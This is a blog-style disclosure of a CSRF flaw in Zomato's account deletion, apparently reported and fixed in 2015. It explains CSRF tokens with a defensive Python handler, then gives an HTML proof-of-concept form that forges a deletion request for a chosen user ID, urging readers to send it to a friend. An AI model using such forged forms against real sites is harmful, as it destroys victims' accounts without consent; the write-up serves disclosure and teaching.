How I deleted your Zomato account!

Hi friends 😀,

Zomato is an online restaurant search and discovery service providing information on home delivery, dining out, cafés and nightlife for various cities in India and 21 other countries. It has 62.5 million registered users.

I was caught by it, so I was messing around with Zomato. While checking out the settings section I found the “delete my account” option, and after clicking on that a prompt like this appears:

[Screenshot: zomato hack]

Now to delete the account you have to type “delete” inside it and confirm! But there was a flaw: there was no CSRF token available to validate the request.

What is a CSRF token?
A CSRF token is a protective measure used to prevent cross-site request forgery attacks: it is a secret value, tied to the logged-in user, that the server expects in every state-changing request, so the server can check whether the request really came from the legitimate user’s own page or from some other site.
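As an added illustration (not code from the original post or from Zomato), here is the server-side check that was missing: the delete handler binds a random per-session token to the logged-in user, rejects any POST that does not carry it, and acts on the session’s own user instead of trusting a userid field in the body. The function names and the in-memory session store are my own assumptions.

```python
import hmac
import secrets

# Constructed in-memory session store (assumption, stands in for a real backend):
# session id -> {"user_id": ..., "csrf_token": ...}
SESSIONS = {}

def create_session(user_id):
    """Log a user in: mint a session id and a random, per-session CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user_id": user_id, "csrf_token": secrets.token_urlsafe(32)}
    return sid

def render_delete_form(sid):
    """The site's own 'delete my account' page embeds the session's token.
    A third-party page can make the browser send the cookie, but it cannot
    read this value, so it cannot build a request that passes the check."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form action="/delete-account" method="POST">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input type="text" name="confirm">'
            '<input type="submit" value="Delete"></form>')

def handle_delete_account(cookies, form):
    """Server-side handler. Returns (HTTP status, deleted user id or None)."""
    sid = cookies.get("session")
    session = SESSIONS.get(sid)
    if session is None:
        return 401, None                      # not logged in
    # Constant-time comparison of the submitted token with the session's token.
    submitted = str(form.get("csrf_token", "")).encode()
    if not hmac.compare_digest(submitted, session["csrf_token"].encode()):
        return 403, None                      # missing or forged token: reject
    if form.get("confirm") != "delete":
        return 400, None                      # user did not type "delete"
    # Act only on the logged-in user; ignore any attacker-supplied "userid" field.
    user_id = session["user_id"]
    del SESSIONS[sid]
    return 200, user_id
```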

Now the exploitation part
I created a quick working piece of code which allows you to delete any user’s account, so to delete his or her account you just need to send this code as HTML or as a link. 😛

Code?
<form action="[deletion endpoint URL, missing from the original post]" method="POST">

<input type="hidden" name="reason" value="woot woot">

<input type="hidden" name="userid" value="[User ID to whom you wanna delete]">

<input type="submit" value="Submit request">

</form>



Video PoC:
Save this as delete.html and send it to your friend!

Exploitability?

It was easy to grab any user’s userid by just visiting their profile and copying that user id, which increased its severity. 😉

[+] Fixing timeline

[+] July 21, 2015: Reported to the CEO (report sent to Deepinder Goyal) and CTO
[+] July 21, 2015: Reported to the support team
[+] Bug fixed by the team.

Let the #internet be a #safer place 🙂

